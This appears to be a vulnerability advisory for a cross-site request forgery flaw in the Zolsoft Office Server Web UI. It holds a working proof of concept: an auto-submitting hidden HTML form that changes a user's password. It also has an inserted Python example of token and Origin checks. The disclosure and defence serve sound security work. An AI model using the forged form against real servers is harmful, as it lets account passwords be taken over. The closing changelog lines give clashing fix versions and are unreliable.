<html>
<body onload="document.forms[0].submit()">
<form action="http://localhost/options3.htm" method="post">
<input type="hidden" name="PassField1" value="new_password" />
<input type="hidden" name="PassField2" value="new_password" />
</form>
</body>
</html>
Thursday, May 6, 2010
Zolsoft Office Server Free Edition 2010.0502 XSRF
A cross-site request forgery vulnerability in the Zolsoft Office Server Web UI can be exploited to change the password of a user.
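The server-side check that makes the auto-submitting form above fail, as an added example (not Zolsoft's code and not part of the original post). The session layout, the `csrf_token` field name and `ALLOWED_ORIGIN` are assumptions; `PassField1`, `PassField2` and `/options3.htm` come from the form above.

```python
import hmac
import secrets

# Assumption: the Web UI is served from this origin (taken from the form action above).
ALLOWED_ORIGIN = "http://localhost"

def new_session():
    """Create a session holding a random anti-CSRF token (hypothetical session layout)."""
    return {"user": "admin", "csrf_token": secrets.token_urlsafe(32)}

def check_password_change(headers, form, session):
    """Return (allowed, reason) for a POST to /options3.htm."""
    # 1. The browser sets Origin itself; a page on another site cannot override it.
    origin = headers.get("Origin")
    if origin is not None and origin != ALLOWED_ORIGIN:
        return False, "cross-origin request"
    # 2. The token is embedded only in the UI's own form; another site cannot read it.
    sent = form.get("csrf_token", "")
    if not hmac.compare_digest(sent.encode(), session["csrf_token"].encode()):
        return False, "missing or invalid CSRF token"
    # 3. Only now look at the password fields themselves.
    if not form.get("PassField1") or form.get("PassField1") != form.get("PassField2"):
        return False, "password fields do not match"
    return True, "ok"

def demo():
    session = new_session()
    fields = {"PassField1": "new_password", "PassField2": "new_password"}
    # Constructed request: the fields the form above sends, from a foreign origin.
    forged = check_password_change(
        {"Origin": "http://attacker.example"}, dict(fields), session)
    # Constructed request: same fields with no Origin header at all, still no token.
    forged_no_origin = check_password_change({}, dict(fields), session)
    # Constructed request: submitted from the UI's own form, which carries the token.
    legit = check_password_change(
        {"Origin": ALLOWED_ORIGIN},
        {"PassField1": "s3cure", "PassField2": "s3cure",
         "csrf_token": session["csrf_token"]},
        session)
    return forged, forged_no_origin, legit

if __name__ == "__main__":
    for result in demo():
        print(result)
```

The token check is the control that matters; the Origin comparison is a second layer and is skipped when the header is absent.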
Version 2010.0120: Fixed the cross-site request bug in the Web service.
Version 2010.0625: Fixed the cross-site request bug in the Web service.